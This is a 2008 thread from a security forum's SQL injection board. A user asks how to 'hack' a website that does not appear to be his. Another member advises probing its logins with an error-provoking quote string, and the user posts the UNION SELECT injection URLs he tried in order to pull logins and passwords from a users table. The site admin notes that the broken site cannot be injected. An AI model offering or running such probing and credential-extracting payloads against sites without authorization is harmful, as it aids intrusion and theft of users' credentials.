 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
plz MySQL |
 |
 Posted: Thu May 01, 2008 6:07 pm |
 |
|
| killr |
| Regular user |
 |
|
| Joined: May 01, 2008 |
| Posts: 5 |
|
|
|
 |
|
 |
|
I want ask any body here if this MySQL error can hack or no
I'm test this code
and I have get error
Resource
Warning: MySQL Connection Failed: Access denied for user: 'xxx@xx.xx.xx' (Using password: YES) in /usr1/local/share/doc/vhost/xxx/httpdocs/html/resource.php on line 82
Warning: Supplied argument is not a valid MySQL result resource in /usr1/local/share/doc/vhost/xxx/httpdocs/html/resource.php on line 87
An error occurred while accessing database.
-------
can any one tell me if I can hack |
|
|
|
|
|
Re: plz MySQL |
|
| Posted: Thu May 01, 2008 6:44 pm |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
| killr wrote: | I want ask any body here if this MySQL error can hack or no
I'm test this code
and I have get error
Resource
Warning: MySQL Connection Failed: Access denied for user: 'xxx@xx.xx.xx' (Using password: YES) in /usr1/local/share/doc/vhost/xxx/httpdocs/html/resource.php on line 82
Warning: Supplied argument is not a valid MySQL result resource in /usr1/local/share/doc/vhost/xxx/httpdocs/html/resource.php on line 87
An error occurred while accessing database.
-------
can any one tell me if I can hack |
No, you can not hack through this.
Reasons:
[x] There isn't even a connection to the database.
[x] Their code isn't correct to spit out the data, possibly even execute it. |
|
|
|
|
|
|
|
|
| Posted: Thu May 01, 2008 7:10 pm |
|
|
| killr |
| Regular user |
|
|
| Joined: May 01, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
mr Oilik thank you full for help 
but how can get another methode for hack this site
and I cannot get name and version this script
I'm looking on view source nothing name script
however thank you |
|
|
|
|
| Posted: Thu May 01, 2008 7:39 pm |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
| killr wrote: | mr Oilik thank you full for help
but how can get another methode for hack this site
and I cannot get name and version this script
I'm looking on view source nothing name script
however thank you |
It's probably a custom site, just look around and play with news items or logins if there are any. Try erroring MySQL to try and see if they're vulnerable. Try something like '--';!--'--'''-; which is random, but should spit out an error on a vulnerable script. |
|
|
|
|
|
|
|
|
| Posted: Thu May 01, 2008 7:47 pm |
|
|
| killr |
| Regular user |
|
|
| Joined: May 01, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
Yes I'm try over Sql injection but nothing seam error
look some sql i'm try for site
| Code: | | resource.php?id=union+select+1,2,3,4,5/* |
and
resource.php?id=1%20union%20select%20login,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20form%20users/*/resource.php?id=convert(int,(select+user));-- | Code: |
all this sql seam error
Resource
Warning: MySQL Connection Failed: Access denied for user: 'xx@xx.datastates.net' (Using password: YES) in /usr1/local/share/doc/vhost/xx.com/httpdocs/html/resource.php on line 82
any idea |
[/quote] |
|
|
|
|
| Posted: Thu May 01, 2008 8:15 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| That website does not function properly - so you can't use sql injection ... |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 69
Members: 0
Total: 69
